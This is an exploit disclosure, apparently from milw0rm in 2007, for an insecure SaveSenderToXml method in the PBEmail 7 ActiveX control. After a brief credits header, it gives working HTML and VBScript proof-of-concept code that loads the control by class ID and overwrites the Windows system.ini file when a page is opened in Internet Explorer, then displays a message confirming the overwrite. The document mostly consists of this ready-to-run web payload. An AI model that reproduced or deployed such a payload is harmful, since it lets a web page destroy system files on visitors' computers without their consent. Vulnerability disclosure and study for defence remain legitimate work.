<pre> <b>Found by</b>: Katatafish (karatatata{at}hush{dot}com) <b>software</b>:PBEmail 7 ActiveX Edition <b>Vendor:</b> http://www.perfectionbytes.com <b>vulnerability</b>: Insecure method SaveSenderToXml(XmlFilePath: BSTR); stdcall; in PBEmail7Ax.dll <b>Tested on Internet explorer 7 with Windows XP SP 2.</b> <b>Thanks:</b> str0ke </pre> <object classid="clsid:30C0FDCB-53BE-4DB3-869D-32BF2DAD0DEC" id="kat"></object> <script language="vbscript"> kat.SaveSenderToXml "C:\WINDOWS\system.ini" MyMsg = MsgBox ("Done! Your C:\WINDOWS\system.ini file should now be overwriten.") </script> # milw0rm.com [2007-10-12]